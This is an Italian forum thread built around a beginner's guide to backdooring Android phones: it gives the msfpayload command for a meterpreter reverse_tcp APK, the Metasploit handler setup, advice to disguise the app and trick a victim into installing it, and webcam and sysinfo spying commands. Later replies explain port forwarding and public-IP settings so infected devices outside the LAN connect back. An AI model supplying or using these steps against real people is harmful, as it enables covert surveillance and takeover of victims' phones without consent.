Guida [GUIDA] come hackerare dispositivo android con backdoor !

Stato
Discussione chiusa ad ulteriori risposte.
Quando capirete che gli antivirus sono inutili?

Diciamo che l'antivirus ti protegge nella navigazione web.
Blocca tutti gli AdWare che vogliono auto-installarsi appena si preme un link,e poi offrono un ottimo strumento per la scansione di file locali che potrebbero essere dannosi o infetti....naturalmente con un po di buon senso se ne può fare anche a meno.
 
Cosa non capisci in: "La porta non la apri nel SO bensì nel router"

:facepalm::facepalm::facepalm::facepalm::facepalm::facepalm::facepalm::facepalm:
Stavo cercando le porte nel router.
Ho trovato solo delle cose chiamate LAN, un cancello ed un portinaio.
Purtroppo niente porte però... :/

Adesso apro la 443 e ti faccio sapere :facepalm:
 
Diciamo che l'antivirus ti protegge nella navigazione web.
Blocca tutti gli AdWare che vogliono auto-installarsi appena si preme un link,e poi offrono un ottimo strumento per la scansione di file locali che potrebbero essere dannosi o infetti....naturalmente con un po di buon senso se ne può fare anche a meno.
Non ne esistono, grazie a dio, di questo tipo.
O meglio, non dovrebbero esistere, se esistessero sarebbe un grosso problema per il mondo del web.
Scaricare ed aprire un malware / installare un addon / eseguire un applet java != autoinstallarsi.
 
Ultima modifica:
Due domande veloci:

1. Se io sto usando VirtualBox (per creare il virus), che IP devo mettere?
2. Posso testare la backdoor su Blue Starks (simulatore di android per windows)?

Grazie :)
 
Due domande veloci:

1. Se io sto usando VirtualBox (per creare il virus), che IP devo mettere?
2. Posso testare la backdoor su Blue Starks (simulatore di android per windows)?

Grazie :)
Non ne sono sicuro e vorrei che qualcuno ci rispondesse..ma credo che andrebbe messo l'ip locale della VM...(spero di non aver detto una grande cavolata) [emoji38]
 
Bella guida, già conosciuta e prevedo tante lamerate ahaha

Inviato dal mio GT-I9300 utilizzando Tapatalk
 
Ok... so di essere molto in ritardo... ma come faccio a permettere all'apk di connettersi al mio pc da una rete che non sia lan (dato che in lan funziona)? Ho capito il port forwarding ma essendo che ho il router fornito da fastweb lo piglio dato che non è gestibile...
 
Ultima modifica:
Sul nuovo android 6.0 hanno aggiunto la crittografia.... la backdoor potrebbe funzionare o no su questa nuova versione di android?
 
ciaooo a tutti ragazzi ! sono nuovo nel forum ! :spam: questa è la mia prima guidaaaa :)

come da titolo ecco come creare una backdoor tramite un'apk creata tramite payload con kali linux =)

PREMESSA:

la guida originale in inglese la trovate qui --> Hacking Android Smartphone using Metasploit in Kali Linux « Hacking With Kali Linux
ed il video tutorial qui -->

io ho solo voluto testare la guida e riproporla in italiano passo passo per dare una mano a tutti :)

allora iniziamooo :D

passo 1 :

iniziamo con il digitare nel terminale il payload da utilizzare con relativo nostro indirizzo ip ( reperibile tramite il comando "ifconfig" e poi sulla voce " inet addr= ... " ) e la porta da utilizzare.

HTML:
 msfpayload android/meterpreter/reverse_tcp LHOST=<nostro ip> LPORT=<nostra porta> R > hack.apk

android_hack1.jpg


ps. consiglio la porta "443" e di personalizzare il nome dell'apk.

passo 2 :

apriamo msfconsole da terminale !

passo 3 :

selezioniamo l'exploit

HTML:
use exploit/multi/handler

selezioniamo il payload

HTML:
set payload android/meterpreter/reverse_tcp

android_hack2.jpg


settiamo l'indirizzo ip preimpostato

HTML:
set lhost <ip>

settiamo la porta preimpostata

HTML:
set lport 443

android_hack3.jpg


ora digitiamo exploit e mettiamoci finalmente in ascolto !! =) installate l' apk sul device della vittima ( cambiando immagina nome e con una bella scusa :rofl: ) potremo con i vari comandi ( webcam_list, sysinfo, webcam_sanp ecc.. ) fare foto, screen, registrare messaggi ecc. come una backdoor per pc!

android_hack5.jpg


grazie a tutti e buon divertimento !! :)
 
Non ne sono sicuro e vorrei che qualcuno ci rispondesse..ma credo che andrebbe messo l'ip locale della VM...(spero di non aver detto una grande cavolata) [emoji38]

Forse sono un po' in ritardo :asd: comunque se siete in lan mettete l'indirizzo IP di kali, quindi della VM, se invece la vittima si trova al di fuori della lan dovete mettere nel payload (cioè il file apk che state creando) l'ip pubblico del vostro router (occhio che se è dinamico cambia ad ogni riavvio del router), mentre quando andate ad avviare l'ascolto mettete l'ip di kali...
Ovviamente dovete aver effettuato il port forwarding
 
Stato
Discussione chiusa ad ulteriori risposte.